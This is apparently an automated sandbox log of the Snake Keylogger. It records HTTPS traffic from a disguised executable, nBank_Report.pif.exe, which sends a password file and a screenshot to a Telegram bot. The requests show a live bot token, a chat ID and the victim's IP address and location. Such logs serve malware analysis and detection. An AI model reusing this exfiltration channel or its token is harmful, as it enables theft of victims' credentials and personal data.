                                              2024-09-26 09:34:40 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:40 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:40 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:40 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:40 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:40 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:40 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:40 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:41 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:41 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.1049776149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:42 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce5b5bb1434ee
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:42 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 35 62 35 62 62 31 34 33 34 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce5b5bb1434eeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:43 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:42 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:43 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6359,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343282,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.1049777149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:43 UTC718OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce6134f881863
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:43 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 31 33 34 66 38 38 31 38 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce6134f881863Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:43 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:43 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:43 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:43 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:43 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:43 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:43 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
